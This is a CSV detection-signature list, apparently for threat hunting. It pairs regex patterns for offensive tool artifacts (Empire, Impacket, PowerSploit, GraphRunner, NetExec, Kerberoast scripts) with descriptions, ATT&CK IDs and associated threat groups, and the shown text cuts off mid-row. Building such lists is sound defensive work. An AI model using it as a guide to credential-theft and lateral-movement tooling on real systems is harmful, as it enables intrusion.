"*Get-System.ps1*",".{0,1000}Get\-System\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46284"
"*Get-SystemDNSServer.ps1*",".{0,1000}Get\-SystemDNSServer\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SystemDNSServer.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46285"
"*Get-SystemNamedPipe*",".{0,1000}Get\-SystemNamedPipe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-System.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46286"
"*Get-TeamsChat *",".{0,1000}Get\-TeamsChat\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46287"
"*Get-TeamsChat*Downloads full Teams chat conversations*",".{0,1000}Get\-TeamsChat.{0,1000}Downloads\sfull\sTeams\schat\sconversations.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","46288"
"*getTGT.py -dc-ip *",".{0,1000}getTGT\.py\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46289"
"*getTGT.py -dc-ip*",".{0,1000}getTGT\.py\s\-dc\-ip.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","46290"
"*getTGT.py*",".{0,1000}getTGT\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46291"
"*gettgtpkinit.py -cert-pfx *",".{0,1000}gettgtpkinit\.py\s\-cert\-pfx\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","46292"
"*gettgtpkinit.py -cert-pfx*",".{0,1000}gettgtpkinit\.py\s\-cert\-pfx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46293"
"*gettgtpkinit.py -pfx-base64 *",".{0,1000}gettgtpkinit\.py\s\-pfx\-base64\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46294"
"*gettgtpkinit.py*",".{0,1000}gettgtpkinit\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","46295"
"*Get-TimedScreenshot.ps1*",".{0,1000}Get\-TimedScreenshot\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46297"
"*Getting permissions of sensitive files.*",".{0,1000}Getting\spermissions\sof\ssensitive\sfiles\..{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","46298"
"*Getting the Obfuscated JS Code*",".{0,1000}Getting\sthe\sObfuscated\sJS\sCode.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","46299"
"*Get-TrustTicket.ps1*",".{0,1000}Get\-TrustTicket\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","46300"
"*Get-UnattendSensitiveData*",".{0,1000}Get\-UnattendSensitiveData.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46301"
"*Get-UniqueTokens*",".{0,1000}Get\-UniqueTokens.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46302"
"*get-unixUserPassword.py*",".{0,1000}get\-unixUserPassword\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","46303"
"*Get-USBKeystrokes*",".{0,1000}Get\-USBKeystrokes.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46305"
"*Get-UserBadPwdCount*",".{0,1000}Get\-UserBadPwdCount.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SMBAutoBrute.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46306"
"*get-userPassword.py*",".{0,1000}get\-userPassword\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","46307"
"*Get-UserPrivileges*",".{0,1000}Get\-UserPrivileges.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","46308"
"*Get-UserPRTToken*",".{0,1000}Get\-UserPRTToken.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","46309"
"*GetUserSPNs.*",".{0,1000}GetUserSPNs\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","46310"
"*GetUserSPNs.ps1*",".{0,1000}GetUserSPNs\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","46311"
"*GetUserSPNs.ps1*",".{0,1000}GetUserSPNs\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","46312"
"*GetUserSPNs.py*",".{0,1000}GetUserSPNs\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","46313"
"*GetUserSPNs.vbs*",".{0,1000}GetUserSPNs\.vbs.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","46314"
"*getusrdompwinfo *;quit*",".{0,1000}getusrdompwinfo\s.{0,1000}\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","46315"
"*Get-VaultCredential*",".{0,1000}Get\-VaultCredential.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46316"
"*Get-VaultCredential*",".{0,1000}Get\-VaultCredential.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46317"
"*Get-VaultCredential.ps1*",".{0,1000}Get\-VaultCredential\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - 